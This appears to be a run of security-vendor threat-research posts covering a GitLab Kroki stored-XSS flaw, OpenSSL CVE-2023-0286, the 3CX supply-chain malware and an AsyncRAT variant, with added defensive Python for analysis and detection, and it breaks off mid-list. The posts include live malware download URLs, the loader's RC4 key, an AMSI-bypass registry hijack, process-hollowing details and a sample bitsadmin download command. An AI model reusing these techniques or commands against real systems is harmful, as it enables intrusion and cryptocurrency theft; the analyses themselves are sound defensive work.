  GitLab’s kroki diagram generation process enables users to create and embed various types of diagrams within their documentation using GitLab Flavored Markdown (GFM) or CommonMark formatting. Kroki supports a wide range of diagramming languages, such as PlantUML, Graphviz, Mermaid, and more, making it a versatile and valuable tool for developers to visually represent complex ideas and workflows. While this feature enhances GitLab’s capabilities, it also introduces potential security risks, as demonstrated by the stored XSS vulnerability discussed below.

  A stored cross-site scripting (XSS) vulnerability is a type of security flaw that allows an attacker to inject malicious scripts into a web application. These scripts are then executed in the context of the user’s browser. In the case of GitLab, this vulnerability is reported to stem from improper input sanitization during the kroki diagram generation process. Input sanitization is a critical security measure involving the removal or modification of user inputs to prevent malicious code execution within the application.

  The vulnerability occurs when GitLab post-processes rendered code blocks: the lang attribute of the pre element is copied into the data-src attribute of the generated img element without proper escaping. An attacker can exploit this by writing a raw <pre><code> HTML block instead of the standard fenced code block syntax and supplying a malicious lang attribute. The example below illustrates how the Markdown HTML changes before and after post-processing, resulting in an altered data-src attribute that can be used to execute malicious code.

  To exploit this vulnerability, a remote, authenticated attacker would need to create a node with a malicious description within GitLab. If successful, this could result in arbitrary script execution in the target user’s browser, potentially leading to the compromise of sensitive information, unauthorized access, or other malicious activities.
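As an added illustration (not GitLab's code), the Python below models the reported defect: the lang attribute is read from a well-formed, entity-encoded pre block, exactly as an HTML parser decodes it, and then copied into the img data-src attribute either verbatim or through an allow-list plus attribute escaping. KROKI_BASE_URL, the function names and the sample markup are assumptions.

```python
import html
import re
from html.parser import HTMLParser

KROKI_BASE_URL = "https://kroki.example"  # assumed server base URL, not GitLab's real setting


class PreLangCollector(HTMLParser):
    """Collects the lang attribute of every <pre>. The parser decodes entity
    references, so a value authored as plantuml&quot; ... comes back with real quotes."""

    def __init__(self):
        super().__init__()
        self.langs = []

    def handle_starttag(self, tag, attrs):
        if tag == "pre":
            for name, value in attrs:
                if name == "lang" and value is not None:
                    self.langs.append(value)


def extract_pre_langs(markup: str) -> list:
    parser = PreLangCollector()
    parser.feed(markup)
    parser.close()
    return parser.langs


def kroki_img_unescaped(lang: str, encoded_diagram: str) -> str:
    """Models the defect: the decoded lang value is interpolated verbatim."""
    return f'<img data-src="{KROKI_BASE_URL}/{lang}/{encoded_diagram}">'


def kroki_img_hardened(lang: str, encoded_diagram: str) -> str:
    """Allow-list the diagram language name, then attribute-escape everything interpolated."""
    if not re.fullmatch(r"[a-z0-9]+", lang):
        raise ValueError(f"unsupported diagram language: {lang!r}")
    return (
        f'<img data-src="{KROKI_BASE_URL}/{html.escape(lang, quote=True)}'
        f'/{html.escape(encoded_diagram, quote=True)}">'
    )


def attribute_count(tag: str) -> int:
    """Number of name="..." attributes a browser would see on the tag; more than
    one on the img means the lang value broke out of data-src."""
    return len(re.findall(r'\s[\w-]+="', tag))


# Constructed markup: well-formed HTML (one pre attribute, entity-encoded quotes),
# so a well-formedness check alone does not reject it.
SAMPLE_MARKUP = (
    '<pre lang="plantuml&quot; data-x=&quot;y"><code>@startuml\n@enduml</code></pre>'
)

if __name__ == "__main__":
    lang = extract_pre_langs(SAMPLE_MARKUP)[0]
    print("decoded lang:", repr(lang))
    print("unescaped:", kroki_img_unescaped(lang, "abc"))
    try:
        print("hardened:", kroki_img_hardened(lang, "abc"))
    except ValueError as exc:
        print("hardened rejected:", exc)
```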

Triggering the Problem:

  • The target system must have the vulnerable product installed and running.
  • The attacker must have network connectivity to the affected ports.
  • The attacker must have authorized access to a user with the ability to submit GitLab markdown to a page.
  • The target system must have kroki diagrams enabled.

Triggering Conditions:

  The attacker authenticates to the target system as a user with the ability to submit GitLab markdown to a page. The authenticated attacker submits malicious markdown.

Attack Delivery:

  The following application protocols can be used to deliver an attack that exploits this vulnerability:
    • HTTP
    • HTTPS

SonicWall’s Intrusion Prevention System (IPS) provides protection against this threat:

  • IPS: 3676 GitLab Kroki Diagram XSS 1

  • IPS: 3677 GitLab Kroki Diagram XSS 2

Remediation Details:

  The risks posed by this vulnerability can be mitigated or eliminated by:
    • Updating to a non-vulnerable version of the product.
    • Filtering attack traffic using the signatures above.
    • Disabling kroki diagrams.
  The vendor has released the following advisory regarding this vulnerability:
  Vendor Advisory

OpenSSL CRL Verification Vulnerability

Overview:

  SonicWall Capture Labs Threat Research Team has observed the following threat:

  Public Key Infrastructure (PKI) is a comprehensive framework for managing digital certificates and cryptographic keys, serving as the foundation for secure communication over the internet. PKI comprises several components, such as Certificate Authorities (CAs), registration authorities, and end-user systems, all working together to create, distribute, store, and manage digital certificates. OpenSSL is an open-source software library that supports the implementation of PKI by providing a robust set of cryptographic functions, including the generation and management of digital certificates and keys, as well as secure communication protocols.

  Transport Layer Security (TLS) is a cryptographic protocol designed to ensure privacy and data integrity between applications communicating over a network. TLS relies on digital certificates, which follow the X.509 standard, to authenticate the identities of communicating parties and establish secure connections. The X.509 standard has evolved through different versions, with each enhancing the functionality of the previous one. The most widely used version is X.509 v3, which supports extensions for additional certificate features. Certificate Revocation Lists (CRLs) are a crucial aspect of maintaining the integrity of PKI, as they contain information about digital certificates that have been revoked, allowing applications to verify the trustworthiness of certificates before establishing secure connections.

  Abstract Syntax Notation One (ASN.1) is a language used for describing data structures that can be represented, encoded, transmitted, and decoded in a platform-independent manner. ASN.1 plays a significant role in defining the structure of X.509 certificates and CRLs, enabling their consistent interpretation across different systems. Distinguished Encoding Rules (DER) is a subset of ASN.1 that provides a specific, unambiguous encoding for these data structures. DER ensures that any given ASN.1-defined data structure has a unique binary representation, which is essential for the proper functioning of cryptographic processes, such as digital signature verification. Together, ASN.1 and DER contribute to the seamless and secure exchange of information across networks and systems.

  The GeneralName structure is defined using ASN.1 notation and consists of several types of names and identifiers, including:

    01. otherName: Represents an application-specific name, defined as an object identifier (OID) and a value.
    02. rfc822Name: Represents an email address.
    03. dNSName: Represents a domain name.
    04. x400Address: Represents an X.400 address, used in a specific type of email system.
    05. directoryName: Represents a distinguished name (DN) in the X.500 directory format.
    06. ediPartyName: Represents an Electronic Data Interchange (EDI) party name.
    07. uniformResourceIdentifier (URI): Represents a Uniform Resource Identifier, such as a URL or URN.
    08. ipAddress: Represents an IP address, either in IPv4 or IPv6 format.
    09. registeredID: Represents an object identifier (OID) registered to a specific entity.

  A type confusion vulnerability has been reported in OpenSSL. The vulnerability is due to improper X.400 address processing inside an X.509 GeneralName structure.

  A remote attacker could exploit the vulnerability by sending crafted traffic to the target system. Successful exploitation could result in denial of service or sensitive information disclosure.

  Vendor Homepage

CVE Reference:

  This vulnerability has been assigned the Common Vulnerabilities and Exposures (CVE) identifier CVE-2023-0286.

  CVE Listing

Common Vulnerability Scoring System (CVSS):

  The overall CVSS score is 5.7 (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:H/E:U/RL:O/RC:C).

  Base score is 6.5 (AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:H), based on the following metrics:
    • Attack vector is network.
    • Attack complexity is high.
    • Privileges required is none.
    • User interaction is none.
    • Scope is unchanged.
    • Impact of this vulnerability on data confidentiality is low.
    • Impact of this vulnerability on data integrity is none.
    • Impact of this vulnerability on data availability is high.
  Temporal score is 5.7 (E:U/RL:O/RC:C), based on the following metrics:
    • The exploit code maturity level of this vulnerability is unproven.
    • The remediation level of this vulnerability is official fix.
    • The report confidence level of this vulnerability is confirmed.

  CVSS Calculator Metrics

Technical Overview:

  The type confusion vulnerability in OpenSSL arises from its handling of certificate verification with Certificate Revocation Lists (CRLs). During the SSL certificate verification process, the check_cert() method is called, and if the certificate contains a CRL Distribution Point extension with the X509_V_FLAG_CRL_CHECK flag set, the crl_crldp_check() function is executed.

  This function iterates through each Distribution Point in the certificate’s X.509 SEQUENCE, calling the idp_check_dp() function to compare the fullName with the one from the CRL. The process eventually calls the GENERAL_NAME_cmp() function to compare values from the X.509 certificate and the CRL. If the name utilizes the x400Address choice in the GeneralName, it calls the ASN1_TYPE_cmp() function for comparison. However, this function fails to validate the data payload before invoking ASN1_STRING_cmp(), leading to the use of arbitrary pointers in a memcmp call.

  Exploiting this vulnerability requires a remote attacker to provide both a malicious certificate and a malicious CRL. A successful attack can lead to a denial-of-service condition or the disclosure of memory content, which poses a significant risk to the security and stability of systems relying on OpenSSL for secure communications. Both TLS client and server applications are vulnerable, emphasizing the need for developers and administrators to take prompt action to address the issue.
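As an added example (not OpenSSL code and not part of the original advisory), the following Python walks a DER-encoded GeneralNames SEQUENCE, names the CHOICE alternative of each entry using the context-specific tag numbers listed above, and reports any entry that uses the x400Address choice. That choice is practically never used in CRL distribution points, so its presence in a certificate or CRL is a useful triage signal while unpatched hosts remain. The sample GeneralNames bytes are constructed, with a placeholder ORAddress body.

```python
"""Walk a DER-encoded GeneralNames SEQUENCE and report which GeneralName CHOICE
alternative each entry uses, so the rarely used x400Address choice ([3]) can be
flagged during certificate and CRL triage."""

# Context-specific tag numbers of the GeneralName CHOICE (RFC 5280)
GENERAL_NAME_CHOICES = {
    0: "otherName", 1: "rfc822Name", 2: "dNSName", 3: "x400Address",
    4: "directoryName", 5: "ediPartyName", 6: "uniformResourceIdentifier",
    7: "iPAddress", 8: "registeredID",
}


def read_tlv(buf, pos):
    """Parse one DER TLV at buf[pos].
    Returns (tag_class, constructed, tag_number, value, next_pos)."""
    first = buf[pos]
    tag_class, constructed, tag_number = first >> 6, bool(first & 0x20), first & 0x1F
    if tag_number == 0x1F:
        raise ValueError("high-tag-number form not expected in GeneralName")
    pos += 1
    length = buf[pos]
    pos += 1
    if length & 0x80:                       # long-form length
        n = length & 0x7F
        if n == 0 or n > 4:
            raise ValueError("indefinite or oversized length is not valid DER")
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    end = pos + length
    if end > len(buf):
        raise ValueError("truncated TLV")
    return tag_class, constructed, tag_number, buf[pos:end], end


def parse_general_names(der):
    """Return [(choice_name, constructed, value_bytes)] for a GeneralNames SEQUENCE."""
    tag_class, constructed, tag_number, body, end = read_tlv(der, 0)
    if not (tag_class == 0 and constructed and tag_number == 16) or end != len(der):
        raise ValueError("expected exactly one universal SEQUENCE")
    names, pos = [], 0
    while pos < len(body):
        tag_class, constructed, tag_number, value, pos = read_tlv(body, pos)
        if tag_class != 2:                  # every GeneralName alternative is context-specific
            raise ValueError("GeneralName entries must be context-specific tagged")
        names.append((GENERAL_NAME_CHOICES.get(tag_number, f"unknown[{tag_number}]"),
                      constructed, value))
    return names


def x400_entries(der):
    """Entries a verifier would treat as ORAddress; any at all is unusual in a CRL DP."""
    return [n for n in parse_general_names(der) if n[0] == "x400Address"]


# Constructed sample: a dNSName followed by an x400Address whose ORAddress body is a
# placeholder SEQUENCE { NULL }; not taken from any real certificate or CRL.
SAMPLE_GENERAL_NAMES = (
    b"\x30\x13"                       # SEQUENCE, 19 bytes of content
    + b"\x82\x0b" + b"example.com"    # [2] dNSName (primitive)
    + b"\xa3\x04\x30\x02\x05\x00"     # [3] x400Address (constructed)
)

if __name__ == "__main__":
    for name, constructed, value in parse_general_names(SAMPLE_GENERAL_NAMES):
        print(name, "constructed" if constructed else "primitive", value)
    print("x400Address present:", bool(x400_entries(SAMPLE_GENERAL_NAMES)))
```

The walker deliberately rejects anything that is not strict DER (indefinite lengths, high tag numbers) rather than guessing, which is the right default for a triage tool looking at untrusted certificate material.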

Triggering the Problem:

  • The target must be running a vulnerable version of the affected product.
  • The attacker must have a malicious leaf certificate and a malicious CRL.
  • The target must trust the malicious CRL to verify the malicious leaf certificate.

Triggering Conditions:

  The attacker must be able to deliver a malicious certificate and a malicious CRL to the affected applications using OpenSSL library. The vulnerability is triggered when the CRL is used to verify the malicious certificate.

Attack Delivery:

  The following application protocols can be used to deliver an attack that exploits this vulnerability:
    • TLS
    • DTLS
    • FTP
    • HTTP
    • HTTPS
    • IMAP
    • NFS
    • POP3
    • SMB/CIFS
    • SMTP
    • SMTPS
    • SIPS


SonicWall’s Intrusion Prevention System (IPS) provides protection against this threat:

  • IPS: 18961 OpenSSL X.400 Address Type Confusion 3

Remediation Details:

  The risks posed by this vulnerability can be mitigated or eliminated by:
    • Apply the vendor-provided patch to eliminate the vulnerability.
    • Filter attack traffic using the signature above.
  The vendor has released the following advisory regarding this vulnerability:
  Vendor Advisory

3CX Desktop App compromised in a supply chain attack

The SonicWall Capture Labs threat research team has observed and analyzed malware known as SmoothOperator that has been embedded within the 3CX VoIP desktop application. This is the result of the 3CX servers being compromised and the attackers gaining access to files that are publicly available for download by customers.  3CX is a popular Voice over Internet Protocol (VoIP) software that allows users to make and receive calls over the internet. It is a multi-platform conferencing application that offers features such as call recording, video conferencing, and integration with other communication tools like Microsoft Teams and Zoom.


Infection cycle:


An unsuspecting customer downloads the 3CX application onto their machine along with compromised DLLs “ffmpeg.dll” and “d3dcompiler_47.dll”.  “d3dcompiler_47.dll” contains malicious data appended after the security directory. When the user launches the 3CX application, it loads “ffmpeg.dll” which reads and executes malicious shellcode from “d3dcompiler_47.dll”.


Loader DLL


The size of the security directory of “d3dcompiler_47.dll” is modified and the encrypted malicious data is appended after the security directory data. The loader DLL “ffmpeg.dll” creates the event “AVMonitorRefreshEvent” to prevent multiple instances of the malware from running; if the event already exists, the malware terminates. The malware retrieves the parent process directory and looks for the file “d3dcompiler_47.dll”; if the file is present, the malware reads it:


The malware parses the “d3dcompiler_47.dll” PE header, retrieves the security directory offset and looks for the marker bytes “FE ED FA CE FE ED FA CE“, which sit just before the encrypted data. The malware decrypts the encrypted data using the RC4 algorithm with the key “3jB(2bsG#@c7”. The initial bytes of the decrypted data are shellcode, followed by a DLL payload:
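As an added analyst-side example (not the loader's code and not SonicWall's), the following Python reproduces the extraction step described above: it searches for the marker bytes after the security directory, RC4-decrypts what follows with the key “3jB(2bsG#@c7”, and splits the result into the shellcode and the DLL that follows it, validating the MZ/PE headers so a stray “MZ” byte pair in the shellcode is not mistaken for the DLL. The security directory offset and size are passed in by the caller (read from data directory entry 4 of the PE, for instance with pefile's `DATA_DIRECTORY[4]`); the sample file bytes and the fake DLL are constructed.

```python
import struct

MARKER = bytes.fromhex("FEEDFACEFEEDFACE")   # marker placed just before the encrypted data
RC4_KEY = b"3jB(2bsG#@c7"                    # RC4 key used by the loader


def rc4(key, data):
    """Plain RC4 (KSA + PRGA); the same call encrypts and decrypts."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def extract_appended_payload(file_bytes, sec_dir_offset, sec_dir_size, key=RC4_KEY):
    """Find the marker after the security directory and RC4-decrypt everything behind it.
    sec_dir_offset/sec_dir_size are the IMAGE_DIRECTORY_ENTRY_SECURITY values (file offset
    and size) taken from the PE data directory; obtaining them is left to the caller."""
    idx = file_bytes.find(MARKER, sec_dir_offset + sec_dir_size)
    if idx < 0:
        return None
    return rc4(key, file_bytes[idx + len(MARKER):])


def _looks_like_pe(blob, off):
    """True if blob[off:] starts with an MZ header whose e_lfanew points at a PE signature."""
    if blob[off:off + 2] != b"MZ" or off + 0x40 > len(blob):
        return False
    e_lfanew = struct.unpack_from("<I", blob, off + 0x3C)[0]
    return blob[off + e_lfanew:off + e_lfanew + 4] == b"PE\0\0"


def split_shellcode_and_dll(blob):
    """The decrypted data is shellcode followed by a DLL: split at the first 'MZ' that is
    really the start of a PE image, not merely the two bytes 'MZ' inside the shellcode."""
    pos = blob.find(b"MZ")
    while pos >= 0:
        if _looks_like_pe(blob, pos):
            return blob[:pos], blob[pos:]
        pos = blob.find(b"MZ", pos + 1)
    return blob, b""


# --- Constructed sample (not the real d3dcompiler_47.dll) ---------------------------
FAKE_HEADERS = b"\x00" * 64          # stands in for the PE headers and sections
FAKE_CERT_TABLE = b"\x00" * 32       # stands in for the Authenticode certificate table
SAMPLE_SHELLCODE = b"\x90" * 4 + b"MZ" + b"\x90" * 10      # contains a decoy 'MZ'
SAMPLE_DLL = b"MZ" + b"\x00" * 58 + struct.pack("<I", 0x40) + b"PE\0\0" + b"\x00" * 8
SAMPLE_FILE = (FAKE_HEADERS + FAKE_CERT_TABLE + MARKER
               + rc4(RC4_KEY, SAMPLE_SHELLCODE + SAMPLE_DLL))
SAMPLE_SEC_DIR = (len(FAKE_HEADERS), len(FAKE_CERT_TABLE))  # (offset, size) of the cert table

if __name__ == "__main__":
    payload = extract_appended_payload(SAMPLE_FILE, *SAMPLE_SEC_DIR)
    shellcode, dll = split_shellcode_and_dll(payload)
    print(len(shellcode), "bytes of shellcode,", len(dll), "bytes of DLL")
```

Starting the marker search at the end of the certificate table, rather than at offset 0, matters on real files: the Authenticode blob is arbitrary data and a naive whole-file search could stop on a false hit before the real marker.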


Shellcode


The shellcode is responsible for reflectively loading the DLL into memory and invoking its functions. The shellcode retrieves API addresses by enumerating PEB_LDR_DATA and comparing the API names with hardcoded hash values:


The shellcode reflectively loads the DLL into memory but does not copy the MS-DOS stub, so that the mapped image looks less suspicious to security software. The shellcode then invokes the exported function “DllGetClassObject” from the loaded DLL:


Payload DLL

After invoking the exported function, the malware invokes another function from the payload DLL, which creates a thread responsible for performing the download activity:


The malware has code to read and create a manifest file in the parent process directory. It generates a random number and waits in a loop using the Sleep API, leaving the loop after a delay derived from the random number:


The malware reads the value of “MachineGuid” from the registry:


The malware tries to download data from URL “https://raw.githubusercontent.com/IconStorages/images/main/icon<integer value in range 0 to 15>.ico”. The URL was down at the time of analysis:


SonicWall Capture Labs provides protection against this threat via the following signatures:

  • GAV: MacOSX.3CX (Trojan)
  • GAV: MacOSX.3CX_1 (Trojan)
  • GAV: Dropper.3CX (Trojan)
  • GAV: Dropper.3CX_1 (Trojan)
  • GAV: Agent.3CX (Trojan)
  • GAV: Agent.3CX_1 (Trojan)

This threat is also detected by SonicWall Capture ATP w/RTDMI and the Capture Client endpoint solutions.


SonicWall customers can also enable the following application signatures to identify the presence of the 3CX application on their systems and network:

  • 2805 => VoIP-APPS 3CX Phone System — HTTPS Activity 1
  • 2810 => VoIP-APPS 3CX Phone System — HTTPS Activity 2
  • 3451 => VoIP-APPS 3CX Phone System — UDP Activity

AsyncRAT variant includes CryptoStealer capabilities

AsyncRAT is a well-known malware family that has been widely active for the last few years. The old variant of AsyncRAT is already destructive; the latest variant advances its capabilities further by adding support for additional C2 commands, a clipper module, a cryptostealer module, a keylogger module and the ability to prevent the system from going to sleep. SonicWall RTDMI detects a JavaScript file which downloads and executes fileless AsyncRAT on the victim’s machine.

JavaScript

The JavaScript contains garbage comments and uses very long variable names to make the code illegible. It downloads a VBScript from the compromised website “h[t][t]ps://dnacapitalgroup.com/wp-includes/images/information.txt” to “%Temp%\VB” using the Windows utility BITSAdmin. The VBScript is launched using Windows Script Host with the engine type explicitly specified as “VBScript”. Windows Script Host normally selects the script engine from the script’s extension, but the malware downloads and executes the VBScript without any extension, which is why the engine must be specified explicitly:
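As an added defender-side example (not code from the post or from SonicWall), the following Python flags the two command-line patterns described above in process-creation telemetry: a Windows Script Host invocation that specifies the engine with `//E:` and runs a script without an extension, and a BITSAdmin transfer whose destination is under a Temp directory. The sample command lines, the example.invalid URL and the user path are constructed; the tokenizer is a simplified approximation of Windows command-line quoting.

```python
import re
from pathlib import PureWindowsPath

# Tokenise a Windows command line: a double-quoted run becomes one token (simplified).
_TOKEN = re.compile(r'"([^"]*)"|(\S+)')
_ENGINE_SWITCH = re.compile(r"//E:(\w+)", re.IGNORECASE)


def tokenize(cmdline):
    return [quoted or bare for quoted, bare in _TOKEN.findall(cmdline)]


def _image_name(token):
    return PureWindowsPath(token).name.lower()


def wsh_engine_override(cmdline):
    """True when wscript/cscript is given an explicit engine (//E:<engine>) and the
    script it is asked to run has no file extension."""
    toks = tokenize(cmdline)
    if not toks or _image_name(toks[0]) not in ("wscript.exe", "cscript.exe", "wscript", "cscript"):
        return False
    engine = script = None
    for t in toks[1:]:
        m = _ENGINE_SWITCH.fullmatch(t)
        if m:
            engine = m.group(1).lower()
        elif t.startswith("//"):
            continue                      # other host switches (//B, //Nologo, ...)
        elif script is None:
            script = t                    # first non-switch argument is the script path
    return engine is not None and script is not None and PureWindowsPath(script).suffix == ""


def bitsadmin_download_to_temp(cmdline):
    """True for 'bitsadmin /transfer ... <url> <dest>' where dest is under a Temp directory."""
    toks = tokenize(cmdline)
    if not toks or _image_name(toks[0]) not in ("bitsadmin.exe", "bitsadmin"):
        return False
    if not any(t.lower() == "/transfer" for t in toks):
        return False
    has_url = any(re.match(r"https?://", t, re.IGNORECASE) for t in toks)
    dest_in_temp = re.search(r"(?i)(%temp%|\\temp\\)", toks[-1]) is not None
    return has_url and dest_in_temp


def triage(cmdlines):
    """Return [(cmdline, [reasons])] for every command line that trips a rule."""
    findings = []
    for line in cmdlines:
        reasons = []
        if wsh_engine_override(line):
            reasons.append("wsh-engine-override-no-extension")
        if bitsadmin_download_to_temp(line):
            reasons.append("bitsadmin-download-to-temp")
        if reasons:
            findings.append((line, reasons))
    return findings


# Constructed sample telemetry (paths, job names and URL are placeholders)
SAMPLE_CMDLINES = [
    r'wscript.exe //E:VBScript "C:\Users\alice\AppData\Local\Temp\VB"',
    r'wscript.exe "C:\Scripts\inventory.vbs"',
    r'cscript.exe //Nologo //E:JScript C:\Tools\build.js',
    r'bitsadmin /transfer job /download /priority normal https://example.invalid/information.txt %Temp%\VB',
    r'bitsadmin /transfer updates https://example.invalid/patch.msi C:\Updates\patch.msi',
]

if __name__ == "__main__":
    for line, reasons in triage(SAMPLE_CMDLINES):
        print(", ".join(reasons), "<-", line)
```

The third sample line shows why the extension check is part of the rule: an explicit `//E:` switch on its own is legitimate, and only its combination with an extension-less script matches the behaviour described in the analysis.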


The tiny, obfuscated VBScript launches a PowerShell script, which downloads and launches the next-layer PowerShell script:


PowerShell Script

The PowerShell script drops a batch script, a VBScript and two PowerShell scripts into “C:\ProgramData\TZOQCBINLOLHJQAPYIDAJV”. It distributes the tasks among these dropped scripts to thwart detection by security vendors, and then starts the next-layer PowerShell script TZOQCBINLOLHJQAPYIDAJV.ps1:

  • TZOQCBINLOLHJQAPYIDAJV.bat
  • TZOQCBINLOLHJQAPYIDAJV.ps1
  • TZOQCBINLOLHJQAPYIDAJV.vbs
  • YPSPPQWKQDKPVWZHQCIIQZ.ps1

TZOQCBINLOLHJQAPYIDAJV.ps1

The PowerShell script schedules a task to execute the VBScript “C:\ProgramData\TZOQCBINLOLHJQAPYIDAJV.vbs” after every 3 minutes:

TZOQCBINLOLHJQAPYIDAJV.vbs

The obfuscated VBScript launches TZOQCBINLOLHJQAPYIDAJV.bat script:

TZOQCBINLOLHJQAPYIDAJV.bat

The batch script hijacks a Component Object Model (COM) server by pointing the registry entry “Computer\HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32” at a non-existent DLL, which bypasses Antimalware Scan Interface (AMSI) scanning on unpatched versions of amsi.dll. The batch script then executes the next-layer PowerShell script YPSPPQWKQDKPVWZHQCIIQZ.ps1:

YPSPPQWKQDKPVWZHQCIIQZ.ps1

The PowerShell script contains a loader and the AsyncRAT binary bytes, encrypted using the TripleDES algorithm. The script invokes method “C” from the loader binary, passing a file path for process hollowing and the AsyncRAT binary’s byte array. The loader hollows the process “C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe” to execute AsyncRAT on the victim’s machine. Because the malware has hijacked the COM server, AMSI scanning of the loader and AsyncRAT byte buffers does not work on unfixed versions of amsi.dll:


AsyncRAT

The old variant of AsyncRAT sends the victim’s information to the C2 server, then receives and executes commands. AsyncRAT is capable of receiving and executing plugins on the victim’s machine. The latest variant keeps the old functionality, and we have additionally observed the following enhancements:

  • CryptoStealer module
  • Enables Clipper module
  • Enables offline keylogger
  • Threat actor’s digital wallet addresses
  • Updated group name
  • Updated hosts and ports

The latest variant uses the same mutex name as the old variants, “AsyncMutex_6SI8OkPnk“. To prevent detection in a sandbox, the malware delays execution by sleeping 1000 milliseconds three times in a loop, then decrypts the configuration information using AES decryption and initializes its variables:


The malware contains code for anti-analysis, anti-VM and anti-sandbox checks and for creating a persistence entry, but as in the old variant these are disabled through flag values. In this variant, the malware enables the flag for the offline Lime keylogger, which logs keystrokes into “%temp%\log.tmp”. The malware keeps the system active and prevents it from going to sleep using the Windows API SetThreadExecutionState with the flags ES_CONTINUOUS, ES_SYSTEM_REQUIRED and ES_DISPLAY_REQUIRED:


The major change we have observed in this variant is the inclusion of a Clipper module, which is intended to steal cryptocurrency. The Clipper module uses regular expressions to look for currency addresses in the clipboard data, covering Bitcoin, Ethereum and Tether wallet addresses, and replaces them with the malware’s wallet addresses:
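As an added example (neither the malware's own regular expressions nor SonicWall's code), the following Python shows how a clipboard-monitoring control can recognise the three address families named above and flag the substitution a clipper performs: an address the user copied being replaced on the clipboard by a different address of the same kind. The address patterns are approximations of the public address formats and every sample address is constructed.

```python
import re

# Approximate public address shapes (this example's own patterns, not the malware's):
# Bitcoin legacy (Base58, starts with 1 or 3) and Bech32 (bc1...), Ethereum and ERC-20
# tokens (0x + 40 hex digits), Tether on Tron (TRC-20: T + 33 Base58 characters).
WALLET_PATTERNS = {
    "BTC": re.compile(r"\b(?:[13][a-km-zA-HJ-NP-Z1-9]{25,34}|bc1[a-z0-9]{25,62})\b"),
    "ETH": re.compile(r"\b0x[a-fA-F0-9]{40}\b"),
    "USDT-TRC20": re.compile(r"\bT[1-9A-HJ-NP-Za-km-z]{33}\b"),
}


def find_addresses(text):
    """All wallet addresses in free text as (kind, address), in order of appearance."""
    hits = []
    for kind, pattern in WALLET_PATTERNS.items():
        for m in pattern.finditer(text):
            hits.append((m.start(), kind, m.group(0)))
    return [(kind, addr) for _, kind, addr in sorted(hits)]


def classify_address(text):
    """Kind of a single address, or None when the text is not exactly one address."""
    s = text.strip()
    for kind, pattern in WALLET_PATTERNS.items():
        if pattern.fullmatch(s):
            return kind
    return None


def clipboard_swap_suspected(copied, clipboard_now):
    """Compare what the user copied (as recorded by a clipboard-history hook) with what
    is on the clipboard now. Returns (suspicious, reason)."""
    before, after = classify_address(copied), classify_address(clipboard_now)
    if before is None:
        return False, "copied text is not a wallet address"
    if copied.strip() == clipboard_now.strip():
        return False, "clipboard unchanged"
    if after == before:
        return True, f"{before} address was replaced by a different {after} address"
    return True, f"{before} address was replaced by other content"


# Constructed sample addresses: valid in shape only, they belong to nobody.
ETH_A = "0x" + "ab12" * 10
ETH_B = "0x" + "deadbeef" * 5
BTC_A = "1" + "AbCd" * 8 + "2"
USDT_A = "T" + "9" * 33

if __name__ == "__main__":
    print(find_addresses(f"pay {ETH_A} or {BTC_A} or {USDT_A}"))
    print(clipboard_swap_suspected(ETH_A, ETH_B))
```

The same-kind replacement is the signature worth alerting on: a user rarely copies two different addresses of the same currency back to back, whereas a clipper by design swaps like for like so the victim's payment screen still looks plausible.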


C2 Communication

The malware selects a random host and port from its lists of host domains/IPs and ports and tries to connect. If the connection to the C2 server fails, the malware tries the next random combination after a sleep of 5000 milliseconds. Once the connection with the C2 server is established, the malware sends the following information from the victim’s machine:

  • Packet type as “ClientInfo”
  • Hardware ID
  • Username
  • Operating System info
  • Execution path
  • Version
  • Execution mode (Admin | User)
  • Active GUI window name
  • Antivirus
  • Chrome MetaMask extension
  • Digital wallet information
    • Bitcoin core
    • Exodus
    • Atomic
    • Electrum
    • Coinomi
    • Ledger
  • Chrome Two Factor Authenticator (2FA) extension
  • Bitcoin core information
  • Exodus information
  • Executable time
  • Pong as empty string
  • Group as “newmekha”
  • Last input time


The malware creates three threads: the first keeps sending ping messages to tell the C2 server that the client is alive, the second counts the time interval for the connection, and the third reads data from the C2 server.

Commands

This variant supports more commands than the old variants. The malware receives data in an encoded and compressed message format, which is decoded to obtain the command. Depending on the command, the message may include additional data (e.g. plugin bytes, the names of processes to kill, or a URL to download a payload from). The malware supports the following commands; after executing a command, the result is sent back to the C2 server.

  • ResetScale
    • Overrides Dots Per Inch (DPI) scaling using Windows API SystemParametersInfoA and sends back “Reset Scale succeeded!”.
  • passload
    • The malware receives plugin bytes along with the command which is loaded in the memory and “PL” method from the plugin is invoked. The Plugin result is sent back to the C2 server.
  • killps
    • The command includes names of comma separated processes which are terminated by the malware.
  • plugin
    • The malware receives the plugin command along with the plugin hash value. The malware checks whether the plugin is already installed on the victim’s machine by looking up the hash value in the registry key “HKEY_CURRENT_USER\Software\<HWID>“. If the plugin is already installed, the malware executes it in memory; otherwise the malware sends the plugin hash value back with the packet type set to “sendPlugin“:
  • savePlugin
    • The malware receives the “savePlugin” command along with the plugin bytes and its hash value. The malware saves the compressed plugin bytes into the registry entry “HKEY_CURRENT_USER\Software\<HWID>” with value name to hash of the plugin. The plugin bytes are decompressed and invoked by the malware.
  • getscreen
    • The malware receives plugin bytes along with the command which is loaded in the memory and “PL” method from the plugin is invoked. The Plugin result is sent back to the C2 server.
  • uacoff
    • The malware receives plugin bytes along with the command which is loaded in the memory and “PL” method from the plugin is invoked. The Plugin result is sent back to the C2 server.
  • DicordTokens
    • The malware receives plugin bytes along with the command which is loaded in the memory and “PL” method from the plugin is invoked. The Plugin result is sent back to the C2 server.
  • weburl
    • The malware receives a URL along with the command. The payload at the URL is downloaded into a temporary file and executed.
  • Net35
    • The malware receives plugin bytes along with the command which is loaded in the memory and “PL” method from the plugin is invoked. The Plugin result is sent back to the C2 server.
  • pong
    • The malware has registered a timer which keeps increasing the interval value. Once the malware receives pong command, the interval value is sent to the C&C server by setting the packet type to “pong”.
  • Avast
